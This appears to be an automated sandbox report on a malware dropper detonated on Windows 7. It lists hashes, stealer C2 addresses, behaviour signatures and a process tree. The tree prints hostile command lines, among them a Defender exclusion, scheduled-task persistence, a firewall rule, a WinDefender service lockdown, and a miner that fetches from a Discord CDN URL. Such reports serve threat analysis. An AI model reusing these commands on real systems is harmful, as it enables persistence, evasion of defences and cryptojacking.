Resubmissions
11-02-2024 08:10
240211-j212ragb47 1011-02-2024 08:09
240211-j2kprseb2w 1009-02-2024 18:28
240209-w4c4xsde9t 1002-02-2024 12:52
240202-p4dxwsgfej 1002-02-2024 12:45
240202-pzapnsgdbp 1016-01-2024 15:29
240116-sw8dbaehh3 1010-01-2024 14:41
240110-r2wq2ahchl 1010-01-2024 13:29
240110-qrqatshbg3 1022-12-2023 08:48
231222-kqp1sadghq 10Analysis
-
max time kernel
1450s -
max time network
1815s -
platform
windows7_x64 -
resource
win7-20231215-es -
resource tags
-
submitted
10-01-2024 13:29
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
redline
@Pixelive
195.20.16.103:20440
Extracted
stealc
http://185.172.128.79
-
url_path
/3886d2276f6914c4.php
Signatures
-
BetaBot
Beta Bot is a Trojan that infects computers and disables Antivirus.
-
Detect Fabookie payload 2 IoCs
-
Fabookie
Fabookie is facebook account info stealer.
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba payload 13 IoCs
-
Modifies firewall policy service 2 TTPs 4 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Stealc
Stealc is an infostealer written in C++.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
-
Windows security bypass 2 TTPs 7 IoCs
-
clop
Ransomware discovered in early 2019 which has been actively developed since release.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Enumerates VirtualBox registry keys 2 TTPs 20 IoCs
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
-
Downloads MZ/PE file
-
Looks for VMWare services registry key. 1 TTPs 4 IoCs
-
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Sets file execution options in registry 2 TTPs 4 IoCs
-
Checks BIOS information in registry 2 TTPs 3 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 53 IoCs
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
UPX packed file 6 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Windows security modification 2 TTPs 7 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 8 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Manipulates WinMon driver. 1 IoCs
Roottkits write to WinMon to hide PIDs from being detected.
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
-
Maps connected drives based on registry 3 TTPs 8 IoCs
Disk information is often read in order to detect sandboxing environments.
-
Modifies boot configuration data using bcdedit 1 IoCs
-
Drops file in System32 directory 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 30 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
-
Drops file in Windows directory 8 IoCs
-
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 6 IoCs
-
NSIS installer 1 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 9 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
GoLang User-Agent 8 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
-
Kills process with taskkill 1 IoCs
-
Modifies Internet Explorer Protected Mode 1 TTPs 4 IoCs
-
Modifies Internet Explorer Protected Mode Banner 1 TTPs 1 IoCs
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies system certificate store 2 TTPs 29 IoCs
-
NTFS ADS 4 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious behavior: MapViewOfSection 36 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"2⤵
- Looks for VMWare services registry key.
- Loads dropped DLL
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\pixelguy.exe"C:\Users\Admin\AppData\Local\Temp\Files\pixelguy.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe"C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
-
C:\Users\Admin\AppData\Local\Temp\Files\newrock.exe"C:\Users\Admin\AppData\Local\Temp\Files\newrock.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
-
C:\Users\Admin\AppData\Local\Temp\Files\bc_memories_from_the_mcp.exe"C:\Users\Admin\AppData\Local\Temp\Files\bc_memories_from_the_mcp.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Files\brg.exe"C:\Users\Admin\AppData\Local\Temp\Files\brg.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Local\Temp\Files\tuc5.exe"C:\Users\Admin\AppData\Local\Temp\Files\tuc5.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pei.exe"C:\Users\Admin\AppData\Local\Temp\Files\pei.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 5244⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\kb^fr_ouverture.exe"C:\Users\Admin\AppData\Local\Temp\Files\kb^fr_ouverture.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3004 -s 4644⤵
- Loads dropped DLL
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\lolMiner.exe"C:\Users\Admin\AppData\Local\Temp\Files\lolMiner.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\a5d66a7d45ad000c9925a7cc663df2a8944fcd5cf8de64533ea36f545599ca39.exe"C:\Users\Admin\AppData\Local\Temp\Files\a5d66a7d45ad000c9925a7cc663df2a8944fcd5cf8de64533ea36f545599ca39.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "a5d66a7d45ad000c9925a7cc663df2a8944fcd5cf8de64533ea36f545599ca39.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\Files\a5d66a7d45ad000c9925a7cc663df2a8944fcd5cf8de64533ea36f545599ca39.exe" & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "a5d66a7d45ad000c9925a7cc663df2a8944fcd5cf8de64533ea36f545599ca39.exe" /f5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\patch.exe"C:\Users\Admin\AppData\Local\Temp\Files\patch.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Files\chdyz.exe"C:\Users\Admin\AppData\Local\Temp\Files\chdyz.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe"C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Files\5fe74ecfd6a9eeef45bed3760e4511c300dc843d17120361e5abd021cc107567.exe"C:\Users\Admin\AppData\Local\Temp\Files\5fe74ecfd6a9eeef45bed3760e4511c300dc843d17120361e5abd021cc107567.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ghoul.exe"C:\Users\Admin\AppData\Local\Temp\ghoul.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1880 -s 7005⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\SuburbansKamacite.exe"C:\Users\Admin\AppData\Local\Temp\Files\SuburbansKamacite.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\Files\asas.exe"C:\Users\Admin\AppData\Local\Temp\Files\asas.exe"3⤵
- Executes dropped EXE
-
C:\Windows\System32\werfault.exe\??\C:\Windows\System32\werfault.exe4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe"C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2800 -s 8484⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\kb%5Efr_ouverture.exe"C:\Users\Admin\AppData\Local\Temp\Files\kb%5Efr_ouverture.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 4644⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\59162d6533d5d56ceedd3f8a24e85e75cd198c72db5719188a4a582752d7fbe4.exe"C:\Users\Admin\AppData\Local\Temp\Files\59162d6533d5d56ceedd3f8a24e85e75cd198c72db5719188a4a582752d7fbe4.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\Files\59162d6533d5d56ceedd3f8a24e85e75cd198c72db5719188a4a582752d7fbe4.exe"{path}"4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\029375780db860b29c868bb8e790fc388d6a0cce986be2b6af6e0bd5d85a5e31.exe"C:\Users\Admin\AppData\Local\Temp\Files\029375780db860b29c868bb8e790fc388d6a0cce986be2b6af6e0bd5d85a5e31.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\Files\029375780db860b29c868bb8e790fc388d6a0cce986be2b6af6e0bd5d85a5e31.exe"C:\Users\Admin\AppData\Local\Temp\Files\029375780db860b29c868bb8e790fc388d6a0cce986be2b6af6e0bd5d85a5e31.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\updHost.exe"C:\Users\Admin\AppData\Local\Temp\Files\updHost.exe"3⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Local\Temp\Files\BestSoftware.exe"C:\Users\Admin\AppData\Local\Temp\Files\BestSoftware.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\npp.exe"C:\Users\Admin\AppData\Local\Temp\Files\npp.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 5644⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Windows Upgrade Manager" /tr "'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe'"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "Windows Upgrade Manager"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Windows Upgrade Manager" /tr "'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe'"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\System32\notepad.exeC:\Windows\System32\notepad.exe2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
C:\Users\Admin\AppData\Local\Temp\C42A.exeC:\Users\Admin\AppData\Local\Temp\C42A.exe2⤵
- Enumerates VirtualBox registry keys
- Sets file execution options in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe3⤵
- Modifies firewall policy service
- Enumerates VirtualBox registry keys
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Drops desktop.ini file(s)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
- NTFS ADS
- Suspicious behavior: MapViewOfSection
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\awwyg33m9kws5s_1.exe/suac4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5D6D.exeC:\Users\Admin\AppData\Local\Temp\5D6D.exe2⤵
- Executes dropped EXE
-
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-934103684-451857973889952618-1040129577-236465806-334412579-1566933122-585022481"1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-HL36M.tmp\tuc2.tmp"C:\Users\Admin\AppData\Local\Temp\is-HL36M.tmp\tuc2.tmp" /SL5="$701F4,4461931,54272,C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe"1⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exeC:\Users\Admin\AppData\Local\Temp\BroomSetup.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\rty25.exe"C:\Users\Admin\AppData\Local\Temp\rty25.exe"1⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"2⤵
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f4⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)5⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeC:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=uiGheigee2Wuisoh -m=https://cdn.discordapp.com/attachments/1176914652060459101/1177177956087504956/xDYNmhJEPV -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:804⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exeC:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id 0db26d82-0b5a-42b3-9ce0-0a1852cf2b75 --tls --nicehash -o showlock.net:443 --rig-id 0db26d82-0b5a-42b3-9ce0-0a1852cf2b75 --tls --nicehash -o showlock.net:80 --rig-id 0db26d82-0b5a-42b3-9ce0-0a1852cf2b75 --nicehash --http-port 3433 --http-access-token 0db26d82-0b5a-42b3-9ce0-0a1852cf2b75 --randomx-wrmsr=-15⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe -hide 17965⤵
- Executes dropped EXE
- Manipulates WinMon driver.
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\a4f5f1769e9bfd6c4510d7b73aa3332f.exeC:\Users\Admin\AppData\Local\Temp\csrss\a4f5f1769e9bfd6c4510d7b73aa3332f.exe4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exeC:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe4⤵
- Executes dropped EXE
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe"C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\nseFD17.tmpC:\Users\Admin\AppData\Local\Temp\nseFD17.tmp2⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 9442⤵
- Program crash
-
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240110133604.log C:\Windows\Logs\CBS\CbsPersist_20240110133604.cab1⤵
- Drops file in Windows directory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes1⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\is-I15D5.tmp\tuc5.tmp"C:\Users\Admin\AppData\Local\Temp\is-I15D5.tmp\tuc5.tmp" /SL5="$80196,4472331,54272,C:\Users\Admin\AppData\Local\Temp\Files\tuc5.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" helpmsg 11022⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 helpmsg 11023⤵
-
-
-
C:\Users\Admin\AppData\Local\Bitrix Report LIB\bitrixreportlib.exe"C:\Users\Admin\AppData\Local\Bitrix Report LIB\bitrixreportlib.exe" -i2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Bitrix Report LIB\bitrixreportlib.exe"C:\Users\Admin\AppData\Local\Bitrix Report LIB\bitrixreportlib.exe" -s2⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2143943737-1365424146-1709277281-769200219406888703-1507548741986470631400021637"1⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x5941⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskeng.exetaskeng.exe {D48B6545-CF9A-4D61-960C-E23418D87CDA} S-1-5-21-928733405-3780110381-2966456290-1000:VTILVGXH\Admin:Interactive:[1]1⤵
-
C:\Users\Admin\Windows Upgrade\wupgrdsv.exe"C:\Users\Admin\Windows Upgrade\wupgrdsv.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
-
